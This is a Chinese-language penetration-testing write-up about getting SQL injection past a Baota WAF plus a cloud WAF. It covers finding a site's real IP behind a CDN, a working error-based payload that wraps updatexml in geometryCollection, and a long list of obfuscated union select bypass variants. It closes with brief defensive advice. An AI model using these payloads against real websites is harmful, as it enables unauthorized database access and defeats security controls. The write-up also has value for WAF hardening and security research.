SQL注入绕过宝塔+云WAF实战技术文档<\/h1>

0x01 多重WAF环境分析<\/h2>

注入点识别<\/h3>

目标点为搜索框<\/li>
通过单双引号测试确认注入类型为字符型<\/li>

环境存在双重防护：

宝塔WAF<\/li>

云WAF<\/li> <\/ul> <\/li> <\/ul>

0x02 云WAF绕过技术<\/h2>

真实IP探测方法<\/h3>

全球Ping测试<\/strong>：通过全球不同节点ping目标域名，无回应的IP可能是CDN节点<\/li>
历史解析记录<\/strong>：检查域名历史解析记录<\/li>

空间搜索引擎<\/strong>：

使用FOFA\/Hunter搜索真实IP<\/li>
注意云厂商IP段（如183.x.x.x）<\/li> <\/ul> <\/li>
C段扫描<\/strong>：基于历史解析记录扫描同C段IP<\/li> <\/ol>
云WAF拦截验证<\/h3>

通过特定测试语句确认是否被云WAF拦截<\/li>
成功绕过云WAF后，可继续测试宝塔WAF<\/li> <\/ul>
0x03 宝塔WAF绕过技术<\/h2>
1. 报错注入绕过<\/h3>
初始测试<\/h4>

测试字符型注入：'||||'<\/code> 或 'or+or'<\/code><\/li>
发现两个or<\/code>之间出现内容即触发WAF<\/li> <\/ul> 绕过思路<\/h4> 尝试';%00<\/code>方法<\/li> 测试--+<\/code>注释符（有效）<\/li> <\/ul> 报错函数测试<\/h4> 常见报错函数被过滤：<\/p> extractvalue<\/code><\/li> updatexml<\/code><\/li> floor<\/code><\/li> <\/ul> <\/li> 未过滤的几何函数：<\/p> Polygon<\/code><\/li> GeometryCollection<\/code><\/li> MultiPoint<\/code><\/li> MultiLineString<\/code><\/li> <\/ul> <\/li> <\/ul> 有效Payload构造<\/h4> 1<\/span>'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+ <\/span><\/span><\/span><\/code><\/pre>执行效果<\/h4> 成功获取数据库名<\/li> 原理：利用未过滤的几何函数包裹被过滤的报错函数<\/li> <\/ul> 2. 联合注入绕过<\/h3> 基础测试<\/h4> 使用'order by x--+<\/code>判断字段数<\/li> 确认17个字段正常，18个字段报错<\/li> <\/ul> Union Select Fuzz测试<\/h4> 测试了大量变形组合，包括但不限于：<\/p> \/*!%55NiOn*\/ \/*!%53eLEct*\/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ \/**\/\/*!12345UNION SELECT*\/\/**\/ \/**\/\/*!50000UNION SELECT*\/\/**\/ \/**\/UNION\/**\/\/*!50000SELECT*\/\/**\/ \/*!50000UniON SeLeCt*\/ union \/*!50000%53elect*\/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt \/*!%55NiOn*\/ \/*!%53eLEct*\/ \/*!u%6eion*\/ \/*!se%6cect*\/ +un\/**\/ion+se\/**\/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) \/*--*\/union\/*--*\/select\/*--*\/ union (\/*!\/**\/ SeleCT *\/ 1,2,3) \/*!union*\/+\/*!select*\/ union+\/*!select*\/ \/**\/union\/**\/select\/**\/ \/**\/uNIon\/**\/sEleCt\/**\/ \/**\/\/*!union*\/\/**\/\/*!select*\/\/**\/ \/*!uNIOn*\/ \/*!SelECt*\/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION\/*&test=1*\/SELECT\/*&pwn=2*\/ un?+un\/**\/ion+se\/**\/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*\/union%252f%252a \/select%252f%252a*\/ \/%2A%2A\/union\/%2A%2A\/select\/%2A%2A\/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A \/*!UnIoN*\/SeLecT+ %55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect <\/code><\/pre> 有效Payload<\/h4> union+distinctROW+select <\/code><\/pre> 执行效果<\/h4> 成功绕过WAF执行联合查询<\/li> 可获取数据库信息<\/li> <\/ul> 总结<\/h2> 关键绕过技术<\/h3> 云WAF绕过<\/strong>：通过真实IP探测避开CDN和云WAF<\/li> 报错注入绕过<\/strong>：利用非常用几何函数包裹被过滤函数<\/li> 联合注入绕过<\/strong>：通过大量变形测试找到未被过滤的union select组合<\/li> <\/ol> 防御建议<\/h3> 对几何函数进行过滤<\/li> 加强union select的变形检测<\/li> 实施严格的输入过滤和参数化查询<\/li> 定期更新WAF规则库<\/li> <\/ol> 本技术文档详细记录了在实际渗透测试中绕过双重WAF的技术细节，可作为安全研究和防御加固的参考。<\/p>